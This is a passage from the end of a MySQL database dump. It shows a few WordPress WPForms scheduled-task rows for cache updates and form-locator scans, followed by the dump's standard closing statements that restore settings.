(3,'wpforms_admin_builder_templates_cache_update','W10=','2022-11-12 13:48:10'),
(4,'wpforms_builder_help_cache_update','W10=','2022-11-12 13:49:18'),
(41,'wpforms_process_forms_locator_scan','W10=','2023-08-20 22:32:58'),
(43,'wpforms_admin_addons_cache_update','W10=','2023-08-20 22:34:30'),
(44,'wpforms_admin_addons_cache_update','W10=','2023-08-20 22:34:30'),
(45,'wpforms_builder_help_cache_update','W10=','2023-08-20 22:34:58'),
(46,'wpforms_admin_builder_templates_cache_update','W10=','2023-08-20 22:34:58');
/*!40000 ALTER TABLE `dnctiavkr_wpforms_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-10-24 15:08:30
